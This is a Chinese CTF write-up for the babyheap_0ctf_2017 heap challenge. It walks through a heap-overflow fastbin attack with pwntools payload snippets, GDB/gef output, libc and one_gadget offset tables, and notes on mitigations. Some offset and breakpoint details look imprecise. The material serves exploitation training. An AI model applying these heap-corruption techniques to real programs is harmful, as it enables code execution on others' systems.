BUUCTF PWN实战:babyheap_0ctf_2017堆溢出漏洞利用全解析(附EXP调试技巧)
BUUCTF PWN实战:babyheap_0ctf_2017堆漏洞利用深度剖析与EXP调优指南
堆漏洞利用一直是二进制安全领域的核心难点,而babyheap_0ctf_2017作为经典堆题目,完美展现了fastbin attack的实战应用场景。本文将带您从内存布局视角重新审视漏洞成因,通过GDB/gef可视化分析技术还原攻击全貌,并分享调试过程中容易踩坑的细节处理技巧。
1. 环境准备与程序行为分析
在开始漏洞利用前,我们需要搭建完整的实验环境并理解程序的基本行为逻辑:
# 实验环境配置 sudo apt install gdb gef python3-pip pip3 install pwntools wget https://github.com/hugsy/gef/raw/master/gef.py -P ~/.gdb/程序运行后呈现典型的堆管理菜单:
1. Alloc 2. Fill 3. Free 4. Dump通过逆向分析可以发现关键数据结构:
struct heap_entry { int in_use; // 占用标志位 size_t size; // 分配大小 void* chunk_ptr; // 实际堆指针 };内存布局初始状态:
| 索引 | 大小 | 状态 |
|---|---|---|
| 0 | 0x10 | Alloc |
| 1 | 0x10 | Free |
| 2 | 0x10 | Alloc |
| 3 | 0x10 | Alloc |
| 4 | 0x80 | Alloc |
注意:不同libc版本中arena偏移可能不同,建议使用
vmmap命令确认当前加载的libc版本
2. 漏洞原理与利用链构建
程序存在两个关键漏洞点:
- 堆溢出漏洞:Fill操作时未校验写入长度,可覆盖相邻chunk元数据
- UAF漏洞:Free后未清空指针,配合溢出可实现任意地址写
利用链分阶段实现:
2.1 泄露libc基地址
通过构造fastbin循环链表实现内存泄露:
alloc(0x10) # chunk0 alloc(0x10) # chunk1 alloc(0x10) # chunk2 alloc(0x10) # chunk3 alloc(0x80) # chunk4 free(1) free(2) # 形成fastbin链:2->1 # 通过chunk0溢出修改chunk2的fd指针 payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21) + p8(0x80) fill(0, payload) # 使chunk2的fd指向chunk4关键GDB调试命令:
gef➤ heap bins fastbins [0x20] 0x555555757020 -> 0x555555757050 -> 0x555555757080 (invalid)2.2 绕过size检查的技巧
要使伪造的chunk通过malloc检查,需要精心构造size字段:
# 修改chunk4的size为fastbin范围 fill(3, p64(0)*3 + p64(0x21)) # 重新分配chunk4 alloc(0x10) # 实际获取chunk2 alloc(0x10) # 获取chunk4,此时存在两个指针指向chunk4内存布局变化:
+---------+---------+---------+ | chunk2 | chunk4 | chunk4 | +---------+---------+---------+3. 高级利用技巧与EXP优化
3.1 精准定位malloc_hook
不同libc版本偏移对照表:
| libc版本 | malloc_hook偏移 | one_gadget偏移 |
|---|---|---|
| 2.23-0ubuntu11 | 0x3c4aed | 0x4526a |
| 2.27-3ubuntu1 | 0x3ebc30 | 0x4f2c5 |
| 2.31-0ubuntu9 | 0x1eeb28 | 0xe6c7e |
定位技巧:
# 自动计算偏移 libc_base = u64(dump(2)[:8].ljust(8,b'\x00')) - 0x3c4b78 malloc_hook = libc_base + libc.symbols['__malloc_hook']3.2 利用fake chunk构造技巧
在__malloc_hook附近寻找合适的伪造位置:
gef➤ x/8gx (void*)&__malloc_hook-0x10 0x7ffff7dd1af0 <_IO_wide_data_0+304>: 0x0000000000000000 0x0000000000000000 0x7ffff7dd1b00 <__memalign_hook>: 0x00007ffff7a92e20 0x00007ffff7a92a00 0x7ffff7dd1b10 <__malloc_hook>: 0x0000000000000000 0x0000000000000000构造payload时需要满足:
- fake chunk的size字段为0x7f
- 确保对齐要求
- 避免触发top chunk合并检查
4. 实战调试技巧与排错指南
4.1 GDB自动化调试脚本
def debug(proc): gdb.attach(proc, ''' set follow-fork-mode child b *0x400A20 # 在malloc处下断点 commands silent heap bins continue end c ''')4.2 常见错误处理方案
SIGSEGV错误:
- 检查伪造的size字段是否符合fastbin要求
- 验证指针是否8字节对齐
Double free检测:
gef➤ heap chunks # 查看chunk的PREV_INUSE标志位one_gadget失效:
- 尝试不同约束条件的gadget
- 使用
libc.search(asm('mov rsp, rdx'))寻找栈调整指令
5. 防御方案与进阶思考
现代防护技术已经针对此类攻击实现了多种缓解措施:
防护机制对比表:
| 机制 | 检测目标 | 绕过难度 |
|---|---|---|
| Safe-Linking | Fastbin指针异或加密 | ★★★★ |
| TCACHE | 引入per-thread缓存 | ★★★ |
| FORTIFY | 增强边界检查 | ★★ |
在最新glibc版本中,建议研究以下替代方案:
- 利用largebin attack实现任意地址写
- 通过IO_FILE结构体进行漏洞利用
- 结合堆风水(House of系列)技术突破防护
掌握堆漏洞利用不仅需要理解内存管理机制,更要培养对内存布局的立体感知能力。建议通过gef-visualize-heap等工具建立直观认知,并在不同libc版本环境中反复实践验证。